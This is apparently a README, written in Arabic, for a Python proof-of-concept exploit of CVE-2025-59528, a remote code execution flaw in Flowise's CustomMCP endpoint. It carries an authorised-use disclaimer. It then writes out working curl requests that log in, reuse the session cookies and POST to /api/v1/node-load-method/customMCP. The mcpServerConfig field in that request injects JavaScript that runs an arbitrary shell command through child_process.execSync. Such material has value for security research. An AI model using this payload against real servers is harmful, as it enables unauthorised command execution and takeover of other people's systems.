
CVE-2025-59528 إثبات المفهوم
نص برمجي لإثبات المفهوم بلغة Python لتشغيل مسار RCE الخاص بـ Flowise CustomMCP عبر POST /api/v1/node-load-method/customMCP.
⚠️ للأغراض التعليمية وأبحاث الأمن المصرح بها فقط. تشغيل هذه الأداة ضد أنظمة لا تملكها أو لا تملك إذنًا كتابيًا لاختبارها يعد غير قانوني.
im-soohyun (Kim SooHyun)CVE-2025-595283.0.53.0.6poc.py: يطلب إدخال عنوان URL/IP للجهاز، وبروتوكول اختياري عند استخدام مضيف/IP مجرد، والبريد الإلكتروني، وكلمة المرور، والأمر؛ يسجّل الدخول، ويعيد استخدام الكوكيز، ثم يرسل طلب CustomMCP مصممًا ويطبع حالة HTTP والترويسات وجسم الاستجابة بطريقة مشابهة لـ curl -i.قم بتشغيل:
python3 poc.py
ثم قدّم:
10.10.11.10 أو http://10.10.11.10 أو https://target.examplecurl -i -X POST https://<MACHINE_URL/IP>/api/v1/auth/login \
-H "Content-Type: application/json" \
-d '{"email":"<[email protected]>","password":"<password>"}'
curl -i -X POST https://<target>/api/v1/node-load-method/customMCP \
-H "Content-Type: application/json" \
-H "x-request-from: internal" \
-H "Cookie: token=<token>; refreshToken=<refreshToken>; connect.sid=<connect.sid>" \
-d '{
"loadMethod":"listActions",
"inputs":{
"mcpServerConfig":"({x:(function(){const cp = process.mainModule.require(\"child_process\");cp.execSync(\"<command>\");return 1;})()})"
}
}'